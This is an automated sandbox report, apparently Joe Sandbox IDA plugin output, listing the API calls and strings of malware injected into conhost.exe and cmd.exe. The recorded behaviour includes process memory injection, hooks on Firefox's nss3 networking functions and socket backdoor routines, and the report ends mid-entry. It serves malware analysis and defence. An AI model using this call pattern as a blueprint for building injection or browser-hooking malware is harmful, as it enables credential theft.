
Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001ABB5F, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

Part of subcall function 001B2507: CreateMutexW.KERNEL32(001C2C30,00000000,?,?,?,?,?), ref: 001B2528

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

GetCurrentThread.KERNEL32(000000F1,19367401,00000001), ref: 001ABB89
SetThreadPriority.KERNEL32(00000000), ref: 001ABB90
WaitForSingleObject.KERNEL32(00001388), ref: 001ABBA8

Part of subcall function 001B31CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001B31ED
Part of subcall function 001B31CC: Process32FirstW.KERNEL32(000001E6,?), ref: 001B3216
Part of subcall function 001B31CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 001B3271
Part of subcall function 001B31CC: CloseHandle.KERNEL32(00000000), ref: 001B328E
Part of subcall function 001B31CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 001B32A1
Part of subcall function 001B31CC: CloseHandle.KERNEL32(?), ref: 001B330E
Part of subcall function 001B31CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 001B331A
Part of subcall function 001B31CC: CloseHandle.KERNEL32(000001E6), ref: 001B332B

WaitForSingleObject.KERNEL32(00001388), ref: 001ABBBD

Part of subcall function 001B6B8E: ReleaseMutex.KERNEL32(00000000,001B3021,?,?,?), ref: 001B6B92

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B6B28, Relevance: 6.0, APIs: 4, Instructions: 42

APIs

TranslateMessage.USER32(?), ref: 001B6B4A
DispatchMessageW.USER32(?), ref: 001B6B55
PeekMessageW.USER32(00000000), ref: 001B6B65
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 001B6B79

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B4A30, Relevance: 6.0, APIs: 4, Instructions: 36

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001B4A3D
Thread32First.KERNEL32(00000000,?), ref: 001B4A58
Thread32Next.KERNEL32(00000000,0000001C), ref: 001B4A6E
CloseHandle.KERNEL32(00000000), ref: 001B4A79

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B040D, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217

APIs

Part of subcall function 001B6973: getsockname.WS2_32(?,?,?), ref: 001B6991

Part of subcall function 001B636E: recv.WS2_32(?,?,00000001,00000000), ref: 001B6392

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 001B04DC
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 001B0515

Part of subcall function 001B64FD: socket.WS2_32(00000000,00000001,00000006), ref: 001B6506
Part of subcall function 001B64FD: bind.WS2_32(00000000,?,-0000001D), ref: 001B6526
Part of subcall function 001B64FD: listen.WS2_32(00000000,?), ref: 001B6535
Part of subcall function 001B64FD: #3.WS2_32(00000000), ref: 001B6540

Part of subcall function 001B672E: accept.WS2_32(00000000,00000000,00000001), ref: 001B6754

Part of subcall function 001B6403: socket.WS2_32(?,00000001,00000006), ref: 001B640C
Part of subcall function 001B6403: connect.WS2_32(00000000,?,-0000001D), ref: 001B642C
Part of subcall function 001B6403: #3.WS2_32(00000000), ref: 001B6437

Part of subcall function 001B67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 001B67CC

Part of subcall function 001B65B7: recv.WS2_32(?,?,00000400,00000000), ref: 001B6600
Part of subcall function 001B65B7: #19.WS2_32(?,?,00000000,00000000), ref: 001B661A
Part of subcall function 001B65B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 001B6657

Part of subcall function 001B675E: shutdown.WS2_32(?,00000002), ref: 001B6766
Part of subcall function 001B675E: #3.WS2_32(?), ref: 001B676D

Part of subcall function 001B0397: getpeername.WS2_32(000000FF,00000000,00000000), ref: 001B03BB
Part of subcall function 001B0397: getsockname.WS2_32(000000FF,00000000,00000000), ref: 001B03CA

Strings

Z, xrefs: 001B064F

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B773A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103

APIs

Part of subcall function 001B46F4: GetTickCount.KERNEL32(001B8766,?), ref: 001B46F4

CharUpperW.USER32(00000000), ref: 001B785B

Strings

.exe, xrefs: 001B7745
bcdfghklmnpqrstvwxz, xrefs: 001B7759

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BD64B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 001BD664

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

GetSystemTime.KERNEL32(?), ref: 001BD6B0

Part of subcall function 001BD42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,001BD581,?,?,00000000), ref: 001BD43F

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

Strings

.txt, xrefs: 001BD746

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A7EF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93

APIs

CoCreateInstance.OLE32(001A16C0,00000000,00004401,001A16D0,?), ref: 001A7F29
CoCreateInstance.OLE32(001A1690,00000000,00004401,001A16A0,?), ref: 001A7F7C

Strings

D, xrefs: 001A7FA7

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B7A14, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64

APIs

StringFromGUID2.OLE32(00000000,?,00000028), ref: 001B7AB5

Strings

Global\, xrefs: 001B7A91
Local\, xrefs: 001B7A9A

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A9C58, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 001A9CA8

Part of subcall function 001B8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001B8B23
Part of subcall function 001B8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001B8B4A
Part of subcall function 001B8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 001B8B94
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 001B8BC1
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?), ref: 001B8BF1
Part of subcall function 001B8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 001B8C1F
Part of subcall function 001B8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 001B8C31

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Strings

&, xrefs: 001A9C7E
#, xrefs: 001A9C8C

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AA579, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 001AA5C9

Part of subcall function 001B8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001B8B23
Part of subcall function 001B8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001B8B4A
Part of subcall function 001B8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 001B8B94
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 001B8BC1
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?), ref: 001B8BF1
Part of subcall function 001B8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 001B8C1F
Part of subcall function 001B8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 001B8C31

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Strings

#, xrefs: 001AA5AD
&, xrefs: 001AA59F

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B2B08, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

GetModuleHandleW.KERNEL32(?), ref: 001B2B1F
GetProcAddress.KERNEL32(00000000,?), ref: 001B2B41

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Strings

0x01D9C0A0, xrefs: 001B2B63

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B8737, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 001B874E

Part of subcall function 001B46F4: GetTickCount.KERNEL32(001B8766,?), ref: 001B46F4

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

Part of subcall function 001B8C40: PathCombineW.SHLWAPI(001B1F45,001B1F45,?), ref: 001B8C5F

Part of subcall function 001B856B: CreateFileW.KERNEL32(001B4E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 001B8585
Part of subcall function 001B856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001B85A8
Part of subcall function 001B856B: CloseHandle.KERNEL32(00000000), ref: 001B85B5

Strings

tmp, xrefs: 001B8767
%s%08x.%s, xrefs: 001B876C

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B6F8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 001B6FB1

Part of subcall function 001B8716: SetFileAttributesW.KERNEL32(00000080,00000080,001BB4CD,?), ref: 001B871F
Part of subcall function 001B8716: DeleteFileW.KERNEL32(?), ref: 001B8729

PathFindFileNameW.SHLWAPI(?), ref: 001B6FD3

Part of subcall function 001B353A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,001B4232,00000000,00000000,00000000,001B3597,00000000,00000000,00000000,?,00000000), ref: 001B3555

Strings

cab, xrefs: 001B6FA6

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BC8A1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42

APIs

Part of subcall function 001B6AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,001B49F4,?,?,?,001B2326,000000FF,001C2C08), ref: 001B6AC3
Part of subcall function 001B6AAA: GetLastError.KERNEL32(?,?,001B49F4,?,?,?,001B2326,000000FF,001C2C08,?,?,00000000), ref: 001B6AC9
Part of subcall function 001B6AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,001B49F4,?,?,?,001B2326,000000FF,001C2C08), ref: 001B6AEF

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,001BC9FB,00000000,?,?,?), ref: 001BC8C6

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001B4CDD: LoadLibraryA.KERNEL32(userenv.dll), ref: 001B4CEE
Part of subcall function 001B4CDD: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 001B4D0D
Part of subcall function 001B4CDD: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 001B4D19
Part of subcall function 001B4CDD: CreateProcessAsUserW.ADVAPI32(?,00000000,001BC8F5,00000000,00000000,00000000,001BC8F5,001BC8F5,00000000,?,?,?,00000000,00000044), ref: 001B4D8A
Part of subcall function 001B4CDD: CloseHandle.KERNEL32(?), ref: 001B4D9D
Part of subcall function 001B4CDD: CloseHandle.KERNEL32(?), ref: 001B4DA2
Part of subcall function 001B4CDD: FreeLibrary.KERNEL32(?), ref: 001B4DB9

CloseHandle.KERNEL32(?), ref: 001BC907

Strings

"%s", xrefs: 001BC8DA

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B5484, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

Part of subcall function 001B5403: LoadLibraryA.KERNEL32(urlmon.dll), ref: 001B5414
Part of subcall function 001B5403: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 001B5427
Part of subcall function 001B5403: FreeLibrary.KERNEL32(?), ref: 001B5479

GetTickCount.KERNEL32(?), ref: 001B54C9

Part of subcall function 001B52D1: WaitForSingleObject.KERNEL32(?,?), ref: 001B5325
Part of subcall function 001B52D1: Sleep.KERNEL32(?,?,?,00000000), ref: 001B5338
Part of subcall function 001B52D1: InternetCloseHandle.WININET(00000000), ref: 001B53BE

GetTickCount.KERNEL32(00000000), ref: 001B54DB

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Strings

http://www.google.com/webhp, xrefs: 001B54A9

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AA2EA, Relevance: 5.2, APIs: 4, Instructions: 197

APIs

Part of subcall function 001B8C40: PathCombineW.SHLWAPI(001B1F45,001B1F45,?), ref: 001B8C5F

Part of subcall function 001B85D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 001B85F5
Part of subcall function 001B85D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,001B2D27,?,?,00000000), ref: 001B8608
Part of subcall function 001B85D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,001B2D27,?,?,00000000), ref: 001B8630
Part of subcall function 001B85D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 001B8648
Part of subcall function 001B85D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,001B2D27,?,?,00000000), ref: 001B8662
Part of subcall function 001B85D0: CloseHandle.KERNEL32(?), ref: 001B866B

StrStrIA.SHLWAPI(?,?), ref: 001AA410
StrStrIA.SHLWAPI(?,?), ref: 001AA422
StrStrIA.SHLWAPI(?,?), ref: 001AA432
StrStrIA.SHLWAPI(?,?), ref: 001AA444

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001B8678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,001BC83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 001B8689
Part of subcall function 001B8678: CloseHandle.KERNEL32(?), ref: 001B8697

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

Part of subcall function 001B8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001B8B23
Part of subcall function 001B8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001B8B4A
Part of subcall function 001B8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 001B8B94
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 001B8BC1
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?), ref: 001B8BF1
Part of subcall function 001B8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 001B8C1F
Part of subcall function 001B8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 001B8C31

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BAD5F, Relevance: 5.1, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(001C3FB4,?,?,?,001BB052,?), ref: 001BAD7C

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

LeaveCriticalSection.KERNEL32(001C3FB4,?,?,?,001BB052,?), ref: 001BAD9D
EnterCriticalSection.KERNEL32(001C3FB4,?,?,?,?,001BB052,?), ref: 001BADAE

Part of subcall function 001B3346: HeapAlloc.KERNEL32(00000008,-00000003,001B36F5,?,?,00000000,001B41E1,?,001B2070,?,?,?,001B4191,?,?,?), ref: 001B3368
Part of subcall function 001B3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,001B36F5,?,?,00000000,001B41E1,?,001B2070,?,?,?,001B4191,?,?), ref: 001B3379

LeaveCriticalSection.KERNEL32(001C3FB4,?,?,?,001BB052,?), ref: 001BAE47

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Analysis Process: cmd.exe PID: 4008 Parent PID: 3684

Executed Functions

Function 00047BF7, Relevance: 7.6, APIs: 5, Instructions: 108

APIs

Part of subcall function 00047BB2: VirtualQueryEx.KERNEL32(000000FF,DB84D88A,?,0000001C,0003C168,DB84D88A,?,?,?,0003BD76,00000000,00000000,00000004,?,?,0003C160), ref: 00047BC7

VirtualProtectEx.KERNELBASE(000000FF,0003C160,0000001E,00000040,00052360,0003C158,00000004,?,?,?,?,0003BE97,6A000523,00000000), ref: 00047C24
ReadProcessMemory.KERNELBASE(000000FF,0003C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,0003BE97,6A000523,00000000), ref: 00047C4B
WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 00047CC5
WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 00047CED
VirtualProtectEx.KERNELBASE(000000FF,0003C160,0000001E,00052360,00052360,?,?,?,?,0003BE97,6A000523,00000000,?,?,0003C160,00052360), ref: 00047D05

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000420C4, Relevance: 49.2, APIs: 17, Strings: 11, Instructions: 229

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00042105
LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00042172
GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 000421A7
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 000421DB
GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 000421FA
GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 0004220C
GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 0004221E
GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 00042230
GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 00042242
GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 00042254
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0004228D
GetProcessHeap.KERNEL32(?,?,00000000), ref: 0004229C
InitializeCriticalSection.KERNEL32(0005400C,?,?,00000000), ref: 000422C9
WSAStartup.WS2_32(00000202,?), ref: 000422DF
CreateEventW.KERNEL32(00052C30,00000001,00000000,00000000,?,?,00000000), ref: 00042300

Part of subcall function 000449D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00042326,000000FF,00052C08,?,?,00000000), ref: 000449E2
Part of subcall function 000449D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00042326,000000FF,00052C08), ref: 00044A0E
Part of subcall function 000449D2: CloseHandle.KERNEL32(?), ref: 00044A23

GetLengthSid.ADVAPI32(00000000,000000FF,00052C08,?,?,00000000), ref: 00042335

Part of subcall function 00041E2D: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 00041E4B
Part of subcall function 00041E2D: PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 00041E5A
Part of subcall function 00041E2D: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 00041E6E

GetCurrentProcessId.KERNEL32(00000000,011EF7D0,00000000,?,?,00000000), ref: 00042362

Part of subcall function 00041E8F: IsBadReadPtr.KERNEL32(?,?), ref: 00041EBD

Part of subcall function 00047A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 00047AB5

Part of subcall function 00041F98: InitializeCriticalSection.KERNEL32(00053FB4,00000000,76C61857,00000000), ref: 00041FAF
Part of subcall function 00041F98: InitializeCriticalSection.KERNEL32(00052AC8), ref: 00041FE4
Part of subcall function 00041F98: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0004200C
Part of subcall function 00041F98: ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00042029
Part of subcall function 00041F98: CloseHandle.KERNEL32(00000000), ref: 0004203A
Part of subcall function 00041F98: InitializeCriticalSection.KERNEL32(000523AC), ref: 00042081
Part of subcall function 00041F98: GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00042093
Part of subcall function 00041F98: GetModuleHandleW.KERNEL32(nss3.dll), ref: 0004209E

Part of subcall function 00041EE1: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00041F2C
Part of subcall function 00041EE1: lstrcmpiW.KERNEL32(?,?,?), ref: 00041F56

Strings

NtCreateThread, xrefs: 000421F4
LdrGetDllHandle, xrefs: 00042244
NtQueryInformationProcess, xrefs: 0004220E
GetProcAddress, xrefs: 0004211D
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 000423AB
Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 000423F3
RtlUserThreadStart, xrefs: 00042220
NtCreateUserProcess, xrefs: 000421FC
SOFTWARE\Microsoft\Xyuxy, xrefs: 000423F9
LdrLoadDll, xrefs: 00042232
LoadLibraryA, xrefs: 00042127

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00041F98, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 91

APIs

InitializeCriticalSection.KERNEL32(00053FB4,00000000,76C61857,00000000), ref: 00041FAF
InitializeCriticalSection.KERNEL32(00052AC8), ref: 00041FE4

Part of subcall function 00042828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 000428A1

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0004200C
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00042029
CloseHandle.KERNEL32(00000000), ref: 0004203A

Part of subcall function 00049D6D: InitializeCriticalSection.KERNEL32(00053F24,00000000,7718F8FF), ref: 00049D8F
Part of subcall function 00049D6D: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 00049E63

Part of subcall function 0004B4D3: GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 0004B4F0

InitializeCriticalSection.KERNEL32(000523AC), ref: 00042081

Part of subcall function 0003E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0003E108
Part of subcall function 0003E0FB: GetThreadDesktop.USER32(00000000), ref: 0003E10F
Part of subcall function 0003E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0003E128

GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00042093
GetModuleHandleW.KERNEL32(nss3.dll), ref: 0004209E

Part of subcall function 0003C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,000420A9), ref: 0003C111
Part of subcall function 0003C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,000420A9), ref: 0003C125
Part of subcall function 0003C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0003C132
Part of subcall function 0003C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0003C13F
Part of subcall function 0003C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0003C14C

Strings

nss3.dll, xrefs: 00042099
nspr4.dll, xrefs: 0004208E

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000469AA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57

APIs

InitializeSecurityDescriptor.ADVAPI32(00052C3C,00000001,00000000,000422ED,?,?,00000000), ref: 000469B4
SetSecurityDescriptorDacl.ADVAPI32(00052C3C,00000001,00000000,00000000,?,?,00000000), ref: 000469C5
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 000469DB
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 000469F7
SetSecurityDescriptorSacl.ADVAPI32(00052C3C,?,?,?,?,?,00000000), ref: 00046A0B
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 00046A18

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 000469D6

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00044B0F, Relevance: 10.6, APIs: 7, Instructions: 74

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 00044B1F
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,76C61857,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 00044B3F
GetLastError.KERNEL32(?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 00044B45

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 00044B6C
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 00044B74
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 00044B8B

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

CloseHandle.KERNEL32(?), ref: 00044BB6

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004768E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54

APIs

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 000476B3

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 000476E2

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

RegCloseKey.KERNEL32(?), ref: 00047702

Strings

